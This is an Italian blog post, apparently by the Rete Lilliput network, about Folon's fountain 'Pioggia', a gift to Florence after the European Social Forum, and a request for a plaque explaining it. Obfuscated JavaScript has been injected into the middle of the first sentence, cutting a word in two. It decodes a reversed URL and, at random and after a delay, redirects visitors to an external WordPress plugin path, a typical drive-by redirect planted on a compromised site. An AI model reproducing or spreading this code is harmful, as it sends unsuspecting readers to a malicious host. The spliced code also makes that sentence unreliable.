Sono passati quasi 3 anni…

image_pdfimage_print

…da quel Forum Sociale Europeo che rese Firenze protagonista di un evento di rilievo mondiale, che portò tante persone alla Fortezza da Basso a discutere di gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andi temi e una marea di gente per le strade per la manifestazione finale. Malgrado gli allarmismi di chi voleva etichettare il movimento come un’orda di vandali, tutto si svolse pacificamente, riscuotendo la simpatia dei cittadini intelligenti che non erano fuggiti altrove. Anzi, proprio per celebrare quell’occasione e i valori che il Forum Sociale portava avanti, e per sbugiardare definitivamente chi aveva voluto terrorizzare la città, la Rete Lilliput ebbe l’idea di chiedere a Folon un’adesione concreta, un regalo alla città.
Qui trovate un brano della lettera originale con cui l’artista esprimeva la soddisfazione di poter donare a Firenze una sua opera, per “premiarla” di aver accolto il Forum Sociale e associarsi idealmente all’evento.
Il regalo di Folon, la fontana “Pioggia”, è stato collocato al centro della rotonda davanti al Saschall, ma ad oggi non c’è una targa che riporti il nome dell’opera e soprattutto il motivo di tale dono.
Ci piacerebbe vederla al più presto, a conferma che questa città e la sua amministrazione ancora credono nei valori della pace e della giustizia globale, e che sarebbero ancora pronti ad ospitare un Social Forum…

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *